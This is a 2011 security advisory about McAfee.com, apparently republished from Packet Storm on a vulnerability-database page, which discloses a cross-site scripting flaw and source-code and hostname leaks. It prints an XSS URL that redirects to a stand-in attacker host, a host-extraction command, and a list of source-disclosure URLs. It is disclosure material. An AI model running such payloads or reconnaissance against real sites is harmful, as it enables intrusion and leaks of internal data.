Lucene search
+L

McAfee Cross Site Scripting / Information Disclosure

🗓️ 27 Mar 2011 00:00:00Reported by Aung KhantType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

Vulnerabilities in McAfee.com including Cross Site Scripting and Information Disclosure, reported and unresolved since 2011

Code
`Vulnerabilities in *McAfee.com  
  
  
1. VULNERABILITY DESCRIPTION  
  
-> Cross Site Scripting  
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')  
  
-> Information Disclosure > Internal Hostname:  
http://www.mcafee.com/js/omniture/omniture_profile.js   
  
($ ruby host-extract.rb -a  
http://www.mcafee.com/js/omniture/omniture_profile.js)  
  
-> Information Disclosure > Source Code Disclosure:  
  
view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp  
view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp  
view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp  
view-source:http://download.mcafee.com/clinic/Includes/common.asp  
view-source:http://download.mcafee.com/updates/upgrade_patches.asp  
view-source:http://download.mcafee.com/updates/common/dat_common.asp  
view-source:http://download.mcafee.com/updates/updates.asp  
view-source:http://download.mcafee.com/updates/superDat.asp   
view-source:http://download.mcafee.com/eval/evaluate2.asp  
view-source:http://download.mcafee.com/common/ssi/conditionals.asp  
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp  
view-source:http://download.mcafee.com/common/ssi/variables.asp  
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp  
view-source:http://download.mcafee.com/common/ssi/errHandler.asp  
view-source:http://download.mcafee.com/common/ssi/common_subs.asp  
view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp  
view-source:http://download.mcafee.com/us/bannerAd.asp  
view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp  
  
  
2. RECOMMENDATION  
  
- Fully utilize Mcafee FoundStone Experts  
- Use outbound monitoring of traffic to detect potential information leakage  
  
  
3. VENDOR  
  
McAfee Inc  
http://www.mcafee.com  
  
  
4. DISCLOSURE TIME-LINE  
  
2011-02-10: reported vendor  
2011-02-12: vendor replied "we are working to resolve the issue as  
quickly as possible"  
2011-03-27: vulnerability found to be unfixed completely  
2011-03-27: vulnerability disclosed  
  
  
5. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak  
Former Disclosure, 2008:  
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/  
Former Disclosure, 2009:  
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml  
Former Disclosure, 2010:  
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html  
host-extract: http://code.google.com/p/host-extract/  
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/  
xssed: http://www.xssed.com/search?key=mcafee.com  
Lessont Learn: http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach  
  
#yehg [2011-03-27]  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation